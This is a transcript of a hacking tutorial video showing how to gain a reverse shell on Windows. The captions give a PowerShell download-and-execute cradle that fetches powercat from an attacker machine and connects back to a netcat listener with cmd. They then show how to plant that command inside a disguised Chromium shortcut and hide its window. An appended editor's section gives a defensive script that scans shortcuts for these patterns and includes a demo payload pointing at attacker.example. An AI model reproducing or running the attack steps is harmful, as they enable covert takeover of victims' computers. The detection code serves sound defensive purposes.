PowerShell Hacking

Captions
With great power comes great responsibility, and today we'll be learning about PowerShell hacking. [Music] So here's what we're learning today. Within a computer we have a Windows machine here, and after which we have something called PowerShell. PowerShell allows us a lot of ability to run scripts and automation that you can write out easily, just like what you possibly have in your Linux system with a bash script. So this gives us the power to run all sorts of instructions, and one of the things we want to do is PowerShell hacking, which is to give us what we call a reverse shell, or even possibly simply something that can give us access directly into the target system, say through a bind shell. Once we have that executed, this gives us full control of the entire computer, and this is really crazy. What we want to do next is to target, say, something like an icon, and the icon will give us the ability to inject PowerShell scripts within it, leading us to the ability to take control of the entire computer again. Now put on your black hat, and let's go.

So right in front of us we're going to our Windows computer, and what you can do is go to the bottom left, enter "powershell", hit enter on that, and that's it, done. Right now inside Windows PowerShell we can write our script and execute commands directly against the target computer. So right here, running PowerShell, let's say you want to create a new file. All you've got to do is enter the following instructions. You can enter, say for example, New-Item -Path, and now we want to specify where we want to place the file. In this case we can do a ./ followed by, say, newfile.txt, followed by, say for example, -ItemType, and let's call this the File item type. Hit enter on that, done. So now we have created a new file right here, so if I minimize this, I go to the left side and see a new file has now been created. Otherwise you can do the same for files, photos, to delete them, remove them, to be able to modify them. All of those options are available for you in PowerShell.

So here I am on our hacker's machine, Kali Linux, your favorite operating system. What I can do now is enter sudo systemctl, followed by the following, and say start apache2.service. Hit enter on that, enter your password, enter, that's it, done. So we managed to start up our web server, and in the status we can see here we have the Apache web server running, our HTTP server running. Now that we've started our web server, what we can do now is go ahead and download a file, any file, to demonstrate that we're able to get those files. So what I can do here is enter the following: wget, followed by, say, http://192.168.0.192, so this is the Kali Linux IP address, followed by slash, say, d4.ps1, so this is a PowerShell script, and then we can have an -OutFile where we want to place the file. In this case I can say C:, for my Users, followed by Desktop, and then in this case default.ps1, and then we hit enter on that and boom, done, the file has now been downloaded. So if I go over into Desktop I can see right here we have again the ability to download that file, and if I do a refresh I see right here we have the default file right there. So I can do a right click, I can look at Properties, and we can see the following information. So we managed to download the file over here; we modified it at 12:41 AM.

Now to take things to the next level, we want to have a reverse shell, we want to gain command execution on the target server. So what we can do is a wget https, and what we want to do now is target some of these available scripts that we can use so that we can get a reverse shell on the target machine. So we can go to githubusercontent, slash besimorhino, slash, and we use powercat. Powercat is going to give us the ability to run just that, to give us our reverse shell. So once you hit enter on that, now we've downloaded the file, and all I've got to do now is move this file, copy this file over into /var/www/html. So let's go ahead and do a cp, followed by powercat.ps1, into /var/www/html/powercat.ps1. Hit enter on that, done. So now we are hosting a malicious file on Kali Linux so that we can serve it to any of our target computers.

Now moving back into the Windows computer, what I can do here is powershell.exe, and what we want to do now is download that file. So here I can do the following: -c, and we can do an IEX, okay, so we are trying to download the object, I'm creating a New-Object from here, so let's go ahead and enter that, .DownloadString, followed by http://192.168.0.192/powercat.ps1, okay, and then we can close this off, and then after which we can go ahead and have this downloaded, and we can also execute it by doing a semicolon. So once we have a semicolon, what we can do here is execute the file that we just downloaded. So all you've got to do now is go ahead and enter, say, powercat, followed by -c, which is the listener that we want to connect to, in this case 192.168.0.192, followed by the port, so let's go in and give it a port of 1237, and then followed by -e cmd, so we want to target the cmd executable. Before we hit enter on this, go back to Kali Linux, and what we want to do now is host our listener. So you can enter, say, nc followed by -nvlp followed by 1237, the port number, hit enter on that, and now we're listening. I hit enter in three, two, one, and now I jump back to Kali, and you can see right here, boom, we are in. On the bottom left side it says Users, Loi Liang Yang, and one of the things we can do very quickly right now is, say for example, I do an echo, or I cd into, say, Desktop, and I do an echo, all right, maybe I say "you have been hacked [Music] by Mr Hacker Loi", and I'll put this into a file, maybe it's hack.txt. I hit enter on that, done. Now we have created the file, and I can enter notepad and we open up this hack.txt, I hit enter on that, and then if I go back into the Windows computer right now you can see right here the pop-up: "you have been hacked by Mr Hacker Loi".

Now what we are truly trying to achieve is not to throw this script straight into the user's computer, but to make it available as a shortcut file. This is the trick, this is the really exciting part. So if you see right here, I have the following, I have a Chromium copy, which is a shortcut file, as you can see here. I can do a right click on this and we can see the properties of some really interesting target that we have. So if you see right here, I have a target, okay, I'm going to close the whole of this, changing up the target of the shortcut file right now, so I'll show you exactly what's going on. With that I can enter powershell.exe, okay, and with powershell.exe what we can do next is use this to execute the instruction that we had earlier. This is exactly the same thing that we used when we were typing out that instruction in PowerShell. Now if you see right here the full target: so with powershell.exe and the exact same command, with enter, all right, we are creating a New-Object, we're downloading the string over here, now we have 192.168.0.182 which is the Kali Linux box, and then after which we run powercat, so in this case we have a target IP address and the port, and we are going to execute on cmd. So you click Apply and you can see right here it automatically fills in for us a target of powershell.exe, so it's under C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. You click OK on this.

I go back over to Kali Linux, I'm going to go ahead and close off this specific netcat listener that we have, I enter a new one, and now I go back over to the Windows computer and I double click on this shortcut file. I double clicked on it, and then if I go back over into Kali Linux you can see right here we now again have the connection to the target computer, so it's game over. Now obviously this pop-up looks very suspicious, so we can hide it. Let me show you how you can hide just that. What we can do here is powershell.exe, I enter -w hidden, so this will hide the window. I click Apply, I click OK, I go back to Kali Linux, and now what I can do is a clear and we can set up our listener once more. I go back to the Windows computer, I double click on this, and boom, that's it, it's game over. Go back over to Kali Linux and here we have it, we have a hidden reverse shell running right here right now. So once again I hope you learned something valuable in today's tutorial, and remember to like, share, subscribe and turn on notifications so that you can be kept abreast of the latest ethical hacking and penetration testing tutorials.
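Added example (editor's, not from the video or from the powercat project): the defensive counterpart to the shortcut trick described in the captions. The video changes a .lnk file's target to powershell.exe with a download-and-execute command line and hides the window with -w hidden; the script below reads .lnk targets and arguments without launching them and flags the same patterns. The function names, the indicator list, the temp folder and the placeholder host attacker.example are assumptions of this example; it relies on the WScript.Shell COM object that ships with Windows, so it runs on a Windows host in Windows PowerShell or pwsh.

```powershell
# Added example, not from the video. Hunts for shortcut (.lnk) files whose target is a
# script host launched with a download cradle, hidden window, or reverse-shell arguments.

function Get-ShortcutInfo {
    param([Parameter(Mandatory)][string]$Path)
    # WScript.Shell reads TargetPath/Arguments from the .lnk without executing it.
    $shell = New-Object -ComObject WScript.Shell
    $lnk   = $shell.CreateShortcut((Resolve-Path -LiteralPath $Path).Path)
    [pscustomobject]@{
        Path        = $Path
        TargetPath  = $lnk.TargetPath
        Arguments   = $lnk.Arguments
        WindowStyle = $lnk.WindowStyle   # 1 = normal, 3 = maximized, 7 = minimized
    }
}

function Find-SuspiciousShortcut {
    param(
        [string[]]$Folder = @(
            [Environment]::GetFolderPath('Desktop'),
            [Environment]::GetFolderPath('Startup'),
            [Environment]::GetFolderPath('StartMenu')
        )
    )
    # Only shortcuts whose target is a script/command host are interesting.
    $hosts = '(?i)\\(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32)\.exe$'
    # Indicator name -> regex applied to the shortcut's argument string (assumed list).
    $indicators = [ordered]@{
        'download cradle'    = '(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-RestMethod|\birm\b'
        'invoke-expression'  = '(?i)\biex\b|Invoke-Expression'
        'hidden window'      = '(?i)-w(indowstyle)?\s+(h(idden)?|1)\b'
        'encoded command'    = '(?i)-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}'
        'no profile/bypass'  = '(?i)-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass'
        'remote url'         = '(?i)https?://'
        'reverse shell tool' = '(?i)powercat|-e\s+cmd(\.exe)?\b'
    }
    Get-ChildItem -Path $Folder -Filter *.lnk -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $info = Get-ShortcutInfo -Path $_.FullName
            if ($info.TargetPath -notmatch $hosts) { return }   # skip non-script-host targets
            $hits = foreach ($name in $indicators.Keys) {
                if ($info.Arguments -match $indicators[$name]) { $name }
            }
            if ($hits) {
                [pscustomobject]@{
                    Shortcut   = $info.Path
                    Target     = $info.TargetPath
                    Arguments  = $info.Arguments
                    Indicators = $hits -join ', '
                }
            }
        }
}

# --- Constructed demo data: one benign shortcut and one modelled on the video's trick ---
$demo = Join-Path $env:TEMP 'lnk-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
$shell = New-Object -ComObject WScript.Shell

$good = $shell.CreateShortcut((Join-Path $demo 'Notepad.lnk'))
$good.TargetPath = "$env:WINDIR\System32\notepad.exe"
$good.Save()

$bad = $shell.CreateShortcut((Join-Path $demo 'Chromium.lnk'))
$bad.TargetPath = "$env:WINDIR\System32\WindowsPowerShell\v1.0\powershell.exe"
# attacker.example is a placeholder; nothing is contacted because the shortcut is never launched.
$bad.Arguments  = '-w hidden -nop -c "IEX (New-Object Net.WebClient).DownloadString(''http://attacker.example/powercat.ps1''); powercat -c attacker.example -p 1237 -e cmd"'
$bad.Save()

Find-SuspiciousShortcut -Folder $demo | Format-List
```

Run as-is on a Windows host: the benign Notepad.lnk is skipped because its target is not a script host, while Chromium.lnk is reported with several indicators. Note that -w hidden lives in the shortcut's argument string, not in the .lnk's own WindowStyle field, so the arguments are where to look. The same IEX-plus-DownloadString cradle is also recorded in full by PowerShell script block logging (Event ID 4104) when that policy is enabled, which gives a second place to hunt for it after the fact.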
Info
Channel: Loi Liang Yang
Views: 70,481
Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp, powershell
Id: ZIzViKPEFIw
Length: 8min 41sec (521 seconds)
Published: Tue Sep 20 2022